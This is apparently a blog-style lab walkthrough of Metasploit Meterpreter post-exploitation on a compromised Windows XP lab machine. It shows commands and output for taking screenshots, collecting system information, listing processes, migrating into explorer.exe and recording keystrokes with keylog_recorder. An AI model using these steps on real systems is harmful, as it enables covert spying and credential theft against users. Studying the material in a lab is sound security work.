Metasploit Meterpreter Shell: Screenshot, sysinfo, ps, migrate, keylog_recorder

This post follows on from a previous post in which the target machine was exploited and a Meterpreter shell obtained.

First to export an image of the target machine’s desktop:

meterpreter > screenshot
Screenshot saved to: /root/hikMIGNN.jpeg

And here’s the result:

I mus say seeing this was rather satisfying!

And now for system information:

meterpreter > sysinfo
Computer : LAB
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

Perfect.

Listing the processes:

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
— —- —- —- ——- —- —-
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
544 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
572 1032 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
596 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
668 1032 inetinfo.exe

[...]

1820  1772  explorer.exe              x86   0           LAB\Lab1                      C:\WINDOWS\Explorer.EXE

Now to “migrate” to explorer.exe:

meterpreter > migrate 1820
[*] Migrating from 3740 to 1820…
[*] Migration completed successfully.

Time for keystroke logging:

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against LAB
[*] Starting the keystroke sniffer…
[*] Keystrokes being saved in to /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
[*] Recording keystrokes…
^C[*] Saving last few keystrokes…
[*] Interrupt
[*] Stopping keystroke sniffer…

Whilst the keystroke logger was running I typed a few things on the target machine, and so in a new terminal, let’s see if the keystrokes have been logged:

:~# cat /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
Keystroke log started at 2013-06-13 11:20:10 +0100
OK this search on Google is
to determine if the Metas
ploit keyy <Back> logger is wo
rking <Back> <Return> <Return> Is any of
this being typed in Notepad
being recorded on the attacki <Back>
ng machine? <Return> <Return> Don’t know yet
, but will find out in a min! <Return> <Return>

Success, every keystroke on the target machine has indeed been recorded on the attacking machine.